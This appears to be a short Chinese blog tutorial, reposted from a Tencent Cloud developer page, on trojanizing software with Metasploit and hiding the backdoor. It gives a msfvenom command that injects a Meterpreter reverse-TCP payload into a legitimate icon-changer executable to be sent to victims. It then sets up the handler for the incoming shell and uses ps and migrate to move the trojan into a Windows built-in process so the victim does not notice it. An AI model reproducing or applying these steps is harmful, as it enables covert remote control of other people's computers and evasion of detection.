在利用msf进行渗透测试时,或者我们将我们自己的木马发送给受害者时,由于我们的木马是临时性的,不能很好的保持持久在线,导致渗透过程失败。那么我们该如何解决这一问题呢!其实方法也很简单,我们只需要将木马的进程转移到其他的程序上即可。这样做一来是防止受害者发现可疑进程而关闭后门程序,二是可以有效的保持木马在线。
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.5.209 LPORT=4444 -x 图标修改器.exe -e x86/33 -f exe -o yue.exe
如上我们在一个正常的软件图标修改器.exe
加入了后门,当受害者运行该软件时,我们则会获得shell。
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.232.195
set LPORT 5555
exploit
运行软件,成功获得shell
首先命令ps
查看当前windows下运行的进程有哪些。
这时,我们要记录下要转移程序的pid
值
比如,我想我木马的进程转移到txt
文档程序下。执行下面命令。
migrate 6296
use espia
这样我们将原来的木马进程转移到了windonds自带的应用程序上。操作更简单,装逼更安全。
版权属于:逍遥子大表哥
本文链接:https://cloud.tencent.com/developer/article/1920665
按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。